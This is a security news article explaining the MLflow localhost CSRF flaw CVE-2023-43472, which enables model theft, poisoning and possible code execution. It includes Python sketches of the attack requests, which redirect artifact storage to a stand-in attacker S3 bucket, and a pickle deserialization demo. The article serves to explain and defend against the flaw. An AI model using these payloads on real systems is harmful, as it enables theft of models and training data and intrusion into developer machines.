MLflow vulnerability enables remote machine learning model theft and poisoning.

It’s been an eventful year for generative artificial intelligence (AI). The release of large language models (LLMs) has demonstrated how powerful the technology can be at making business processes more efficient. Many organizations are now racing to adopt generative AI and train models on their own datasets.

Developing and training AI models can be an expensive endeavor, and the models can easily become some of the most valuable assets a company owns. It is therefore important to keep in mind that these models are susceptible to theft and other attacks, and that the systems hosting them need strong security safeguards and policies in place.

A recent vulnerability in MLflow, an open-source machine learning lifecycle platform, highlights how easily models and their sensitive training data can be stolen or poisoned when a developer simply visits a malicious website on the Internet from the same machine where MLflow runs. The flaw, tracked as CVE-2023-43472, was fixed in MLflow 2.9.0.

Localhost attacks via malicious JavaScript code

Many developers believe that services bound to localhost—the computer’s internal hostname—cannot be targeted from the Internet. However, this is a false assumption, according to Joseph Beeton, a senior application security researcher at Contrast Security, who recently spoke at the DefCamp security conference on attacking developer environments via localhost services.

Beeton recently discovered critical vulnerabilities in the Quarkus Java framework and MLflow that could allow remote attackers to exploit features of development interfaces or APIs that these applications expose locally. The attacks only require the victim to visit an attacker-controlled website in their browser, or a legitimate site where the attacker is able to place specially crafted advertisements.

Drive-by attacks have been around for years, and they are powerful when combined with a cross-site request forgery (CSRF) vulnerability in an application. In the past, hackers used drive-by attacks through malicious advertisements placed on websites to hijack the DNS settings of users’ home routers. In general, browsers only allow JavaScript code to request resources from the same origin (domain). A mechanism called Cross-Origin Resource Sharing (CORS) relaxes this restriction and allows scripts to make requests to different origins if the target server explicitly permits it.

For example, if JavaScript code loaded from domain A tries to make a request to domain B, the browser will first perform a so-called preflight request to check whether domain B has a CORS policy that allows scripted requests from domain A. While this applies to localhost as well, Beeton points out that there is another category, called simple requests, that most browsers (except Safari) still allow without triggering a preflight, because it predates CORS. Such requests are used, for example, by the HTML standard form element to submit data, but they can also be triggered with JavaScript.

A simple request can use the GET, POST, or HEAD method and have a content type of application/x-www-form-urlencoded, multipart/form-data, or text/plain, or no content type at all. Their limitation is that the initiating script cannot read the response unless the target server opts in via the Access-Control-Allow-Origin header.
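The rules above are easy to capture in code. The following is an illustrative sketch (not browser code) of the checks that decide whether a cross-origin request skips the CORS preflight:

```python
from typing import Optional

# Sketch of the browser's "simple request" rules described above: a
# cross-origin request skips the CORS preflight when its method and
# content type are on the safelist (per the Fetch specification).

SIMPLE_METHODS = {"GET", "POST", "HEAD"}
SIMPLE_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}

def is_simple_request(method: str, content_type: Optional[str]) -> bool:
    """Return True if a browser would send this request without a preflight."""
    if method.upper() not in SIMPLE_METHODS:
        return False
    # A missing content type is also allowed for simple requests.
    return content_type is None or content_type.lower() in SIMPLE_CONTENT_TYPES

# A JSON POST triggers a preflight; a text/plain POST does not --
# which is exactly what the MLflow attack described below relies on.
print(is_simple_request("POST", "application/json"))  # False
print(is_simple_request("POST", "text/plain"))        # True
```

This is why a server that accepts text/plain bodies as if they were JSON effectively opts itself out of the preflight protection.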

From an attack perspective, though, reading the response isn’t actually needed as long as the desired action initiated by the request takes place. This is the case for both the MLflow and Quarkus vulnerabilities.

Stealing and poisoning machine learning models

After MLflow is installed, its user interface is accessible by default at http://localhost:5000 and supports a REST API through which actions can be performed programmatically. Typically, API interaction is done via POST requests with a content type of application/json, which is not a permitted content type for simple requests.

However, Beeton found that MLflow’s API did not validate the content type of incoming requests, so it also accepted requests with a text/plain content type. In turn, this allows remote cross-origin attacks through the browser via simple requests.

The API has limited functionality, such as creating a new experiment or renaming an existing one, but not deleting experiments. Conveniently, in MLflow the default experiment in which new data is stored is called “default”, so attackers can first rename it to “old” and then create a new experiment, which will now be called “default” but with an artifact_uri pointing to an external S3 storage bucket that they control.
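The two API calls involved can be sketched as follows. This is a minimal illustration assuming MLflow's documented REST endpoints (`/api/2.0/mlflow/experiments/update` and `/api/2.0/mlflow/experiments/create`); the bucket name is a made-up placeholder, and in the real attack these payloads would be sent cross-origin by JavaScript as text/plain simple requests:

```python
import json

# Base URL of the locally running MLflow tracking server.
BASE = "http://localhost:5000/api/2.0/mlflow/experiments"

# Step 1: rename the existing "default" experiment out of the way.
rename_request = {
    "url": f"{BASE}/update",
    "body": json.dumps({"experiment_id": "0", "new_name": "old"}),
}

# Step 2: recreate "default" with an artifact store the attacker controls,
# so artifacts from future runs are uploaded to the attacker's bucket.
create_request = {
    "url": f"{BASE}/create",
    "body": json.dumps({
        "name": "default",
        "artifact_location": "s3://attacker-bucket/experiments",
    }),
}

# Because the vulnerable API did not validate content types, the JSON
# bodies above still parse server-side even when the browser sends them
# with this preflight-exempt header.
headers = {"Content-Type": "text/plain"}
```

The developer’s MLflow client never notices anything: the experiment is still named “default”, only its artifact location has silently changed.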

“Once a new MLflow run is executed (for example, mlflow run sklearn_elasticnet_wine -P alpha=0.5 with the experiment name default), the result of the run will be uploaded to the S3 bucket,” Beeton explained in a blog post. This allows an attacker to obtain the serialized version of the ML model as well as the data that was used to train it.

An attacker can take it even further. “Given that an ML model is stored in a bucket, the ML model itself would be likely to be poisoned,” the researcher said. “In such an attack, an adversary is able to inject bad data into the model’s training pool, causing it to learn something it shouldn’t.”

Remote code execution can often be achieved

Remote code execution may also be possible if an attacker modifies the model.pkl file to inject a Python pickle exploit. Remote code execution was also the outcome of the Quarkus vulnerability that Beeton found: it could be exploited through simple requests from remote websites because the application’s Dev UI was bound to localhost and had no additional protection against cross-site request forgery attacks.
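The pickle risk is easy to demonstrate. A pickle payload can name any callable to be invoked during deserialization via `__reduce__`; the harmless stand-in below uses `eval` on an arithmetic expression where a real exploit would run attacker-supplied commands instead:

```python
import pickle

class PoisonedModel:
    """Stand-in for a tampered model.pkl file."""
    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call eval('40 + 2')".
        # A real exploit would reference os.system or similar instead.
        return (eval, ("40 + 2",))

# The attacker serializes the object and plants it where model.pkl lives.
payload = pickle.dumps(PoisonedModel())

# Merely loading the file runs the attacker's callable -- no method of
# the "model" ever needs to be invoked by the victim.
result = pickle.loads(payload)
print(result)  # 42
```

This is why pickle files from untrusted artifact stores should be treated as executable code, not as inert data.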

“As I have shown in [the] DefCamp talk, it’s possible to get remote code execution (RCE) on a developer’s machine or on other services on their private network,” the researcher said. “Given that developers have access to codebases, AWS keys, server credentials, etc., access to the developer’s machine gives an attacker a lot of scope to pivot to other resources on the network, to modify the codebase, or to steal it.”
